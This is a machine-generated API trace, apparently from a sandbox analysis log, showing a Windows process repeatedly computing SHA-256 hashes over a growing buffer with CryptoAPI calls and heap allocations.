	[0118.473] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0118.473] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.473] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9ad8
	[0118.473] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9ad8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9ad8, pdwDataLen=0x129364) returned 1
	[0118.473] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.473] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.473] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.473] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.473] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0118.473] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.474] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9b00
	[0118.474] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9b00, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9b00, pdwDataLen=0x129364) returned 1
	[0118.474] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.474] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.474] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.474] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.474] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0118.474] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.474] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9b28
	[0118.474] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9b28, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9b28, pdwDataLen=0x129364) returned 1
	[0118.474] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.474] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.474] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.474] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.474] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0118.474] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.475] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9b50
	[0118.475] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9b50, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9b50, pdwDataLen=0x129364) returned 1
	[0118.475] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.475] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.475] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.475] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.475] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0118.475] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.475] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9b78
	[0118.475] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9b78, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9b78, pdwDataLen=0x129364) returned 1
	[0118.475] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.475] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.475] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.475] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.475] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0118.475] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9ba0
	[0118.476] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9ba0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9ba0, pdwDataLen=0x129364) returned 1
	[0118.476] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.476] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.476] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.476] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.476] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0118.476] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9bc8
	[0118.476] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9bc8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9bc8, pdwDataLen=0x129364) returned 1
	[0118.476] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.476] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.476] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.476] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.476] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0118.476] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9bf0
	[0118.477] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9bf0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9bf0, pdwDataLen=0x129364) returned 1
	[0118.477] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.477] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.477] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.477] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.477] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0118.477] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9c18
	[0118.477] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9c18, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9c18, pdwDataLen=0x129364) returned 1
	[0118.477] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.477] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.477] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.477] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.477] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0118.478] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9c40
	[0118.478] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9c40, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9c40, pdwDataLen=0x129364) returned 1
	[0118.478] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.478] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.478] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.478] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.478] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0118.478] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9c68
	[0118.478] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9c68, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9c68, pdwDataLen=0x129364) returned 1
	[0118.478] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.478] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.478] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.478] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.478] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0118.479] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9c90
	[0118.479] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9c90, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9c90, pdwDataLen=0x129364) returned 1
	[0118.479] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.479] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.479] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.479] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.479] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0118.479] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9cb8
	[0118.479] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9cb8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9cb8, pdwDataLen=0x129364) returned 1
	[0118.479] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.479] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.479] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.479] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.480] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0118.480] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x21ba10
	[0118.480] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x21ba10, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x21ba10, pdwDataLen=0x129364) returned 1
	[0118.480] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.480] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.480] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.480] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.480] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0118.480] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x21b8d0
	[0118.480] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x21b8d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x21b8d0, pdwDataLen=0x129364) returned 1
	[0118.480] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.480] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.480] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.481] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.481] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0118.481] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.481] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb000
	[0118.481] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb000, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb000, pdwDataLen=0x129364) returned 1
	[0118.481] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.481] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.481] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.481] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.481] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0118.481] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.481] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb028
	[0118.481] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb028, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb028, pdwDataLen=0x129364) returned 1
	[0118.481] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.481] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.481] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.482] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.482] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0118.482] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb050
	[0118.482] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb050, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb050, pdwDataLen=0x129364) returned 1
	[0118.482] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.482] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.482] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.482] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.482] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0118.482] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb078
	[0118.482] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb078, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb078, pdwDataLen=0x129364) returned 1
	[0118.482] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.482] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.482] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.483] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.483] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0118.483] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb0a0
	[0118.483] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb0a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb0a0, pdwDataLen=0x129364) returned 1
	[0118.483] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.483] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.483] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.483] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.483] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0118.483] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb0c8
	[0118.483] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb0c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb0c8, pdwDataLen=0x129364) returned 1
	[0118.483] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.483] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.483] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.484] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.484] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0118.484] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb0f0
	[0118.484] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb0f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb0f0, pdwDataLen=0x129364) returned 1
	[0118.484] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.484] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.484] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.484] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.484] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0118.484] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb118
	[0118.484] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb118, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb118, pdwDataLen=0x129364) returned 1
	[0118.484] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.484] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.484] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.485] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.485] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0118.485] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb140
	[0118.485] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb140, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb140, pdwDataLen=0x129364) returned 1
	[0118.485] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.485] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.485] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.485] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.485] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0118.485] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb168
	[0118.485] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb168, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb168, pdwDataLen=0x129364) returned 1
	[0118.485] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.485] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.485] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.486] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.486] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0118.486] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb190
	[0118.486] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb190, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb190, pdwDataLen=0x129364) returned 1
	[0118.486] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.486] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.486] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
